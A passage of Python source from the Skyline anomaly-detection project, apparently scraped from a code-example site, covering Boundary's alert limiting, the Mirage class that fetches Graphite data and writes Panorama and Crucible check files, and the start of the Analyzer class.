                            # alerts the alerter has sent
                            if alerter_limit_set:
                                alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                try:
                                    alerter_sent_count_key_data = self.redis_conn.get(alerter_sent_count_key)
                                    if not alerter_sent_count_key_data:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: redis no alerter key, no alerts sent for - " + str(alerter_sent_count_key))
                                        alerts_sent = 0
                                        send_alert = True
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: alerts_sent set to %s" % str(alerts_sent))
                                            logger.info("debug :: send_alert set to %s" % str(sent_alert))
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: redis alerter key retrieved, unpacking" + str(alerter_sent_count_key))
                                        unpacker = Unpacker(use_list=False)
                                        unpacker.feed(alerter_sent_count_key_data)
                                        raw_alerts_sent = list(unpacker)
                                        alerts_sent = int(raw_alerts_sent[0])
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: alerter %s alerts sent %s " % (str(alerter), str(alerts_sent)))
                                except:
                                    logger.info("No key set - %s" % alerter_sent_count_key)
                                    alerts_sent = 0
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug :: alerts_sent set to %s" % str(alerts_sent))
                                        logger.info("debug :: send_alert set to %s" % str(send_alert))

                                if alerts_sent < alerter_limit:
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug :: alerts_sent %s is less than alerter_limit %s" % (str(alerts_sent), str(alerter_limit)))
                                        logger.info("debug :: send_alert set to %s" % str(send_alert))

                            # Send alert
                            alerter_alert_sent = False
                            if send_alert:
                                cache_key = 'last_alert.boundary.%s.%s.%s' % (alerter, base_name, algorithm)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: checking cache_key - %s" % cache_key)
                                try:
                                    last_alert = self.redis_conn.get(cache_key)
                                    if not last_alert:
                                        try:
                                            self.redis_conn.setex(cache_key, int(anomalous_metric[2]), packb(int(anomalous_metric[0])))
                                            if ENABLE_BOUNDARY_DEBUG:
                                                logger.info('debug :: key setex OK - %s' % (cache_key))
                                            trigger_alert(alerter, datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                            alerter_alert_sent = True
                                        except Exception as e:
                                            logger.error('error :: alert failed :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            logger.error('error :: could not send alert: %s' % str(e))
                                            trigger_alert('syslog', datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: cache_key exists not alerting via %s for %s is less than alerter_limit %s" % (alerter, cache_key))
                                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                except:
                                    trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                            else:
                                trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

                            # Update the alerts sent for the alerter cache key,
                            # to allow for alert limiting
                            if alerter_alert_sent and alerter_limit_set:
                                try:
                                    alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                    new_alerts_sent = int(alerts_sent) + 1
                                    self.redis_conn.setex(alerter_sent_count_key, alerter_expiration_time, packb(int(new_alerts_sent)))
                                    logger.info('set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))
                                except:
                                    logger.error('error :: failed to set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))
                    else:
                        # Always alert to syslog, even if alert_threshold is not
                        # breached or if send_alert is not True
                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

            # Write anomalous_metrics to static webapp directory
            if len(self.anomalous_metrics) > 0:
                filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
                with open(filename, 'w') as fh:
                    # Make it JSONP with a handle_data() function
                    anomalous_metrics = list(self.anomalous_metrics)
                    anomalous_metrics.sort(key=operator.itemgetter(1))
                    fh.write('handle_data(%s)' % anomalous_metrics)

            run_time = time() - now
            total_metrics = str(len(boundary_metrics))
            total_analyzed = str(len(boundary_metrics) - sum(exceptions.values()))
            total_anomalies = str(len(self.anomalous_metrics))

            # Log progress
            logger.info('seconds to run    :: %.2f' % run_time)
            logger.info('total metrics     :: %s' % total_metrics)
            logger.info('total analyzed    :: %s' % total_analyzed)
            logger.info('total anomalies   :: %s' % total_anomalies)
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            graphite_run_time = '%.2f' % run_time
            send_metric_name = skyline_app_graphite_namespace + '.run_time'
            send_graphite_metric(skyline_app, send_metric_name, graphite_run_time)

            send_metric_name = skyline_app_graphite_namespace + '.total_analyzed'
            send_graphite_metric(skyline_app, send_metric_name, total_analyzed)

            send_metric_name = skyline_app_graphite_namespace + '.total_anomalies'
            send_graphite_metric(skyline_app, send_metric_name, total_anomalies)

            send_metric_name = skyline_app_graphite_namespace + '.total_metrics'
            send_graphite_metric(skyline_app, send_metric_name, total_metrics)
            for key, value in exceptions.items():
                send_metric_name = '%s.exceptions.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))
            for key, value in anomaly_breakdown.items():
                send_metric_name = '%s.anomaly_breakdown.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                send_metric_name = skyline_app_graphite_namespace + '.duration'
                send_graphite_metric(skyline_app, send_metric_name, str(time_human))

                send_metric_name = skyline_app_graphite_namespace + '.projected'
                send_graphite_metric(skyline_app, send_metric_name, str(projected))

            # Reset counters
            self.anomalous_metrics[:] = []

            # Only run once per
            process_runtime = time() - now
            try:
                boundary_optimum_run_duration = settings.BOUNDARY_OPTIMUM_RUN_DURATION
            except:
                boundary_optimum_run_duration = 60

            if process_runtime < boundary_optimum_run_duration:
                sleep_for = (boundary_optimum_run_duration - process_runtime)
                logger.info('sleeping %.2f for seconds' % sleep_for)
                sleep(sleep_for)
Ejemplo n.º 49
0
class Mirage(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Mirage
        """
        super(Mirage, self).__init__()
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.mirage_exceptions_q = Queue()
        self.mirage_anomaly_breakdown_q = Queue()
        self.not_anomalous_metrics = Manager().list()
        self.metric_variables = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        # Python >2.5
        except OSError as exc:
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until):
        # We use absolute time so that if there is a lag in mirage the correct
        # timeseries data is still surfaced relevant to the anomalous datapoint
        # timestamp
        if settings.GRAPHITE_PORT != '':
            url = '%s://%s:%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                str(settings.GRAPHITE_PORT), graphite_from, graphite_until,
                metric_name)
        else:
            url = '%s://%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                graphite_from, graphite_until, metric_name)
        r = requests.get(url)
        js = r.json()
        datapoints = js[0]['datapoints']

        converted = []
        for datapoint in datapoints:
            try:
                new_datapoint = [float(datapoint[1]), float(datapoint[0])]
                converted.append(new_datapoint)
            except:
                continue

        parsed = urlparse.urlparse(url)
        target = urlparse.parse_qs(parsed.query)['target'][0]

        metric_data_folder = settings.MIRAGE_DATA_FOLDER + "/" + target
        self.mkdir_p(metric_data_folder)
        with open(metric_data_folder + "/" + target + '.json', 'w') as f:
            f.write(json.dumps(converted))
            f.close()
            return True

        return False

    def load_metric_vars(self, filename):
        if os.path.isfile(filename) == True:
            f = open(filename)
            global metric_vars
            metric_vars = imp.load_source('metric_vars', '', f)
            f.close()
            return True

        return False

    def spin_process(self, i, run_timestamp):
        """
        Assign a metric for a process to analyze.
        """

        # Discover metric to analyze
        metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]

        # Check if this process is unnecessary
        if len(metric_var_files) == 0:
            return

        metric_var_files_sorted = sorted(metric_var_files)
        metric_check_file = '%s/%s' % (
            settings.MIRAGE_CHECK_PATH, str(metric_var_files_sorted[0]))

        # Load metric variables
        self.load_metric_vars(metric_check_file)

        # Test metric variables
        if len(metric_vars.metric) == 0:
            return
        else:
            metric = metric_vars.metric
            metric_name = ['metric_name', metric_vars.metric]
            self.metric_variables.append(metric_name)
        if len(metric_vars.value) == 0:
            return
        else:
            metric_value = ['metric_value', metric_vars.value]
            self.metric_variables.append(metric_value)
        if len(metric_vars.hours_to_resolve) == 0:
            return
        else:
            hours_to_resolve = ['hours_to_resolve', metric_vars.hours_to_resolve]
            self.metric_variables.append(hours_to_resolve)
        if len(metric_vars.metric_timestamp) == 0:
            return
        else:
            metric_timestamp = ['metric_timestamp', metric_vars.metric_timestamp]
            self.metric_variables.append(metric_timestamp)

        # Ignore any metric check with a timestamp greater than 10 minutes ago
        int_metric_timestamp = int(metric_vars.metric_timestamp)
        int_run_timestamp = int(run_timestamp)
        metric_timestamp_age = int_run_timestamp - int_metric_timestamp
        if metric_timestamp_age > settings.MIRAGE_STALE_SECONDS:
            logger.info('stale check       :: %s check request is %s seconds old - discarding' % (metric_vars.metric, metric_timestamp_age))
            # Remove metric check file
#            try:
#                os.remove(metric_check_file)
#            except OSError:
#                pass
#            return
            if os.path.exists(metric_check_file):
                os.remove(metric_check_file)
                logger.info('removed %s' % (metric_check_file))
            else:
                logger.info('could not remove %s' % (metric_check_file))

        # Calculate hours second order resolution to seconds
        second_order_resolution_seconds = int(metric_vars.hours_to_resolve) * 3600

        # Calculate graphite from and until parameters from the metric timestamp
        graphite_until = datetime.datetime.fromtimestamp(int(metric_vars.metric_timestamp)).strftime('%H:%M_%Y%m%d')
        int_second_order_resolution_seconds = int(second_order_resolution_seconds)
        second_resolution_timestamp = int_metric_timestamp - int_second_order_resolution_seconds
        graphite_from = datetime.datetime.fromtimestamp(int(second_resolution_timestamp)).strftime('%H:%M_%Y%m%d')

        # Remove any old json file related to the metric
        metric_json_file = '%s/%s/%s.json' % (
            settings.MIRAGE_DATA_FOLDER, str(metric_vars.metric),
            str(metric_vars.metric))
        try:
            os.remove(metric_json_file)
        except OSError:
            pass

        # Get data from graphite
        logger.info(
            'retrieve data     :: surfacing %s timeseries from graphite for %s seconds' % (
                metric_vars.metric, second_order_resolution_seconds))
        self.surface_graphite_metric_data(metric_vars.metric, graphite_from, graphite_until)

        # Check there is a json timeseries file to test
        if not os.path.isfile(metric_json_file):
            logger.error(
                'error :: retrieve failed - failed to surface %s timeseries from graphite' % (
                    metric_vars.metric))
            # Remove metric check file
            try:
                os.remove(metric_check_file)
            except OSError:
                pass
            return
        else:
            logger.info('retrieved data    :: for %s at %s seconds' % (
                metric_vars.metric, second_order_resolution_seconds))

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        self.check_if_parent_is_alive()

        with open((metric_json_file), 'r') as f:
            timeseries = json.loads(f.read())
            logger.info('data points surfaced :: %s' % (len(timeseries)))

        try:
            logger.info('analyzing         :: %s at %s seconds' % (metric_vars.metric, second_order_resolution_seconds))
            anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_vars.metric, second_order_resolution_seconds)

            # If it's anomalous, add it to list
            if anomalous:
                base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
                anomalous_metric = [datapoint, base_name]
                self.anomalous_metrics.append(anomalous_metric)
                logger.info('anomaly detected  :: %s with %s' % (metric_vars.metric, metric_vars.value))
                # It runs so fast, this allows us to process 30 anomalies/min
                sleep(2)

                # Get the anomaly breakdown - who returned True?
                triggered_algorithms = []
                for index, value in enumerate(ensemble):
                    if value:
                        algorithm = settings.MIRAGE_ALGORITHMS[index]
                        anomaly_breakdown[algorithm] += 1
                        triggered_algorithms.append(algorithm)

                # If Crucible or Panorama are enabled determine details
                determine_anomaly_details = False
                if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
                    determine_anomaly_details = True
                if settings.PANORAMA_ENABLED:
                    determine_anomaly_details = True

                if determine_anomaly_details:
                    metric_timestamp = str(int(timeseries[-1][0]))
                    from_timestamp = str(int(timeseries[1][0]))
                    timeseries_dir = base_name.replace('.', '/')

                # If Panorama is enabled - create a Panorama check
                if settings.PANORAMA_ENABLED:
                    if not os.path.exists(settings.PANORAMA_CHECK_PATH):
                        if python_version == 2:
                            mode_arg = int('0755')
                        if python_version == 3:
                            mode_arg = mode=0o755
                        os.makedirs(settings.PANORAMA_CHECK_PATH, mode_arg)

                    # Note:
                    # The values are enclosed is single quoted intentionally
                    # as the imp.load_source used results in a shift in the
                    # decimal position when double quoted, e.g.
                    # value = "5622.0" gets imported as
                    # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                    # single quoting results in the desired,
                    # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                    added_at = str(int(time()))
                    source = 'graphite'
                    panaroma_anomaly_data = 'metric = \'%s\'\n' \
                                            'value = \'%s\'\n' \
                                            'from_timestamp = \'%s\'\n' \
                                            'metric_timestamp = \'%s\'\n' \
                                            'algorithms = %s\n' \
                                            'triggered_algorithms = %s\n' \
                                            'app = \'%s\'\n' \
                                            'source = \'%s\'\n' \
                                            'added_by = \'%s\'\n' \
                                            'added_at = \'%s\'\n' \
                        % (base_name, str(datapoint), from_timestamp,
                           metric_timestamp, str(settings.MIRAGE_ALGORITHMS),
                           triggered_algorithms, skyline_app, source,
                           this_host, added_at)

                    # Create an anomaly file with details about the anomaly
                    panaroma_anomaly_file = '%s/%s.%s.txt' % (
                        settings.PANORAMA_CHECK_PATH, added_at,
                        base_name)
                    try:
                        write_data_to_file(
                            skyline_app, panaroma_anomaly_file, 'w',
                            panaroma_anomaly_data)
                        logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
                    except:
                        logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
                        logger.info(traceback.format_exc())

                # If crucible is enabled - save timeseries and create a
                # crucible check
                if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
                    metric_timestamp = str(int(timeseries[-1][0]))
                    from_timestamp = str(int(timeseries[1][0]))
                    timeseries_dir = base_name.replace('.', '/')
                    crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp
                    if not os.path.exists(crucible_anomaly_dir):
                        if python_version == 2:
                            mode_arg = int('0755')
                        if python_version == 3:
                            mode_arg = mode=0o755
                        os.makedirs(crucible_anomaly_dir, mode_arg)

                    # Note:
                    # The value is enclosed is single quoted intentionally
                    # as the imp.load_source used in crucible results in a
                    # shift in the decimal position when double quoted, e.g.
                    # value = "5622.0" gets imported as
                    # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                    # single quoting results in the desired,
                    # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0

                    crucible_anomaly_data = 'metric = \'%s\'\n' \
                                            'value = \'%s\'\n' \
                                            'from_timestamp = \'%s\'\n' \
                                            'metric_timestamp = \'%s\'\n' \
                                            'algorithms = %s\n' \
                                            'triggered_algorithms = %s\n' \
                                            'anomaly_dir = \'%s\'\n' \
                                            'graphite_metric = True\n' \
                                            'run_crucible_tests = False\n' \
                                            'added_by = \'%s\'\n' \
                                            'added_at = \'%s\'\n' \
                        % (base_name, str(datapoint), from_timestamp,
                           metric_timestamp, str(settings.MIRAGE_ALGORITHMS),
                           triggered_algorithms, crucible_anomaly_dir,
                           skyline_app, metric_timestamp)

                    # Create an anomaly file with details about the anomaly
                    crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name)
                    try:
                        write_data_to_file(
                            skyline_app, crucible_anomaly_file, 'w',
                            crucible_anomaly_data)
                        logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file))
                    except:
                        logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file))
                        logger.info(traceback.format_exc())

                    # Create timeseries json file with the timeseries
                    json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
                    timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
                    try:
                        write_data_to_file(skyline_app, json_file, 'w', timeseries_json)
                        logger.info('added crucible timeseries file :: %s' % (json_file))
                    except:
                        logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file))
                        logger.info(traceback.format_exc())

                    # Create a crucible check file
                    crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name)
                    try:
                        write_data_to_file(
                            skyline_app, crucible_check_file, 'w',
                            crucible_anomaly_data)
                        logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))
                    except:
                        logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file))
                        logger.info(traceback.format_exc())
            else:
                base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
                not_anomalous_metric = [datapoint, base_name]
                self.not_anomalous_metrics.append(not_anomalous_metric)
                logger.info('not anomalous     :: %s with %s' % (metric_vars.metric, metric_vars.value))

        # It could have been deleted by the Roomba
        except TypeError:
            exceptions['DeletedByRoomba'] += 1
            logger.info('exceptions        :: DeletedByRoomba')
        except TooShort:
            exceptions['TooShort'] += 1
            logger.info('exceptions        :: TooShort')
        except Stale:
            exceptions['Stale'] += 1
            logger.info('exceptions        :: Stale')
        except Boring:
            exceptions['Boring'] += 1
            logger.info('exceptions        :: Boring')
        except:
            exceptions['Other'] += 1
            logger.info('exceptions        :: Other')
            logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.mirage_anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.mirage_exceptions_q.put((key, value))

        # Remove metric check file
        try:
            os.remove(metric_check_file)
        except OSError:
            pass

    def run(self):
        """
        Called when the process intializes.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            """
            Determine if any metric to analyze
            """
            while True:

                # Report app up
                self.redis_conn.setex(skyline_app, 120, now)

                metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
                if len(metric_var_files) == 0:
                    logger.info('sleeping no metrics...')
                    sleep(10)
                else:
                    sleep(1)

                # Clean up old files
                now_timestamp = time()
                stale_age = now_timestamp - settings.MIRAGE_STALE_SECONDS
                for current_file in listdir(settings.MIRAGE_CHECK_PATH):
                    if os.path.isfile(settings.MIRAGE_CHECK_PATH + "/" + current_file):
                        t = os.stat(settings.MIRAGE_CHECK_PATH + "/" + current_file)
                        c = t.st_ctime
                        # delete file if older than a week
                        if c < stale_age:
                                os.remove(settings.MIRAGE_CHECK_PATH + "/" + current_file)
                                logger.info('removed %s' % (current_file))

                # Discover metric to analyze
                metric_var_files = ''
                metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
                if len(metric_var_files) > 0:
                    break

            metric_var_files_sorted = sorted(metric_var_files)
            metric_check_file = settings.MIRAGE_CHECK_PATH + "/" + metric_var_files_sorted[0]

            logger.info('processing %s' % metric_var_files_sorted[0])

            # Remove any existing algorithm.error files from any previous runs
            # that did not cleanup for any reason
            pattern = '%s.*.algorithm.error' % skyline_app
            try:
                for f in os.listdir(settings.SKYLINE_TMP_DIR):
                    if re.search(pattern, f):
                        try:
                            os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
                            logger.info('cleaning up old error file - %s' % (str(f)))
                        except OSError:
                            pass
            except:
                logger.error('failed to cleanup mirage_algorithm.error files - %s' % (traceback.format_exc()))

            # Spawn processes
            pids = []
            spawned_pids = []
            pid_count = 0
            MIRAGE_PROCESSES = 1
            run_timestamp = int(now)
            for i in range(1, MIRAGE_PROCESSES + 1):
                p = Process(target=self.spin_process, args=(i, run_timestamp))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(MIRAGE_PROCESSES)))
                p.start()
                spawned_pids.append(p.pid)

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds - 20160512 @earthgecko
            p_starts = time()
            while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (
                        skyline_app, str(MIRAGE_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            # Log the last reported error by any algorithms that errored in the
            # spawned processes from algorithms.py
            for completed_pid in spawned_pids:
                logger.info('spin_process with pid %s completed' % (str(completed_pid)))
                for algorithm in settings.MIRAGE_ALGORITHMS:
                    algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % (
                        settings.SKYLINE_TMP_DIR, skyline_app,
                        str(completed_pid), algorithm)
                    if os.path.isfile(algorithm_error_file):
                        logger.info(
                            'error - spin_process with pid %s has reported an error with the %s algorithm' % (
                                str(completed_pid), algorithm))
                        try:
                            with open(algorithm_error_file, 'r') as f:
                                error_string = f.read()
                            logger.error('%s' % str(error_string))
                        except:
                            logger.error('failed to read %s error file' % algorithm)
                        try:
                            os.remove(algorithm_error_file)
                        except OSError:
                            pass

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.mirage_anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.mirage_exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            for metric_variable in self.metric_variables:
                if metric_variable[0] == 'metric_name':
                    metric_name = metric_variable[1]
                if metric_variable[0] == 'metric_value':
                    metric_value = metric_variable[1]
                if metric_variable[0] == 'hours_to_resolve':
                    hours_to_resolve = metric_variable[1]
                if metric_variable[0] == 'metric_timestamp':
                    metric_timestamp = metric_variable[1]

            logger.info('analysis done - %s' % metric_name)

            # Send alerts
            # Calculate hours second order resolution to seconds
            logger.info('analyzed at %s hours resolution' % hours_to_resolve)
            second_order_resolution_seconds = int(hours_to_resolve) * 3600
            logger.info('analyzed at %s seconds resolution' % second_order_resolution_seconds)

            if settings.MIRAGE_ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        ALERT_MATCH_PATTERN = alert[0]
                        METRIC_PATTERN = metric[1]
                        alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                        pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                        if pattern_match:
                            cache_key = 'mirage.last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.redis_conn.get(cache_key)
                                if not last_alert:
                                    self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                    trigger_alert(alert, metric, second_order_resolution_seconds)
                                    logger.info('sent %s alert: For %s' % (alert[1], metric[1]))
                            except Exception as e:
                                logger.error('error :: could not send %s alert for %s: %s' % (alert[1], metric[1], e))

            if settings.NEGATE_ANALYZER_ALERTS:
                if len(self.anomalous_metrics) == 0:
                    for negate_alert in settings.ALERTS:
                        for not_anomalous_metric in self.not_anomalous_metrics:
                            NEGATE_ALERT_MATCH_PATTERN = negate_alert[0]
                            NOT_ANOMALOUS_METRIC_PATTERN = not_anomalous_metric[1]
                            alert_match_pattern = re.compile(NEGATE_ALERT_MATCH_PATTERN)
                            negate_pattern_match = alert_match_pattern.match(NOT_ANOMALOUS_METRIC_PATTERN)
                            if negate_pattern_match:
                                try:
                                    logger.info('negate alert sent: For %s' % (not_anomalous_metric[1]))
                                    trigger_negater(negate_alert, not_anomalous_metric, second_order_resolution_seconds, metric_value)
                                except Exception as e:
                                    logger.error('error :: could not send alert: %s' % e)

            # Log progress

            if len(self.anomalous_metrics) > 0:
                logger.info('seconds since last anomaly :: %.2f' % (time() - now))
                logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
                logger.info('exception stats   :: %s' % exceptions)
                logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Reset counters
            self.anomalous_metrics[:] = []
            self.not_anomalous_metrics[:] = []

            # Reset metric_variables
            self.metric_variables[:] = []

            # Sleep if it went too fast
            if time() - now < 1:
                logger.info('sleeping due to low run time...')
#                sleep(10)
                sleep(1)
Ejemplo n.º 50
0
class Analyzer(Thread):
    """
    The Analyzer class which controls the analyzer thread and spawned processes.
    """
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        Create the :obj:`self.anomalous_metrics` list

        Create the :obj:`self.exceptions_q` queue

        Create the :obj:`self.anomaly_breakdown_q` queue

        """
        super(Analyzer, self).__init__()
        # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
        if settings.REDIS_PASSWORD:
            self.redis_conn = StrictRedis(
                password=settings.REDIS_PASSWORD,
                unix_socket_path=settings.REDIS_SOCKET_PATH)
        else:
            self.redis_conn = StrictRedis(
                unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()
        self.mirage_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        """
        Sends the skyline_app metrics to the `GRAPHITE_HOST` if a graphite
        host is defined.
        """
        if settings.GRAPHITE_HOST != '':

            skyline_app_metric = skyline_app_graphite_namespace + name

            sock = socket.socket()
            sock.settimeout(10)

            # Handle connection error to Graphite #116 @etsy
            # Fixed as per https://github.com/etsy/skyline/pull/116 and
            # mlowicki:etsy_handle_connection_error_to_graphite
            # Handle connection error to Graphite #7 @ earthgecko
            # merged 1 commit into earthgecko:master from
            # mlowicki:handle_connection_error_to_graphite on 16 Mar 2015
            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
                sock.settimeout(None)
            except socket.error:
                sock.settimeout(None)
                endpoint = '%s:%d' % (settings.CARBON_HOST,
                                      settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False

            # For the same reason as above
            # sock.sendall('%s %s %i\n' % (name, value, time()))
            try:
                sock.sendall('%s %s %i\n' %
                             (skyline_app_metric, value, time()))
                sock.close()
                return True
            except:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False

        return False

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        Multiple get the assigned_metrics to the process from Redis.

        For each metric:\n
        * unpack the `raw_timeseries` for the metric.\n
        * Analyse each timeseries against `ALGORITHMS` to determine if it is\n
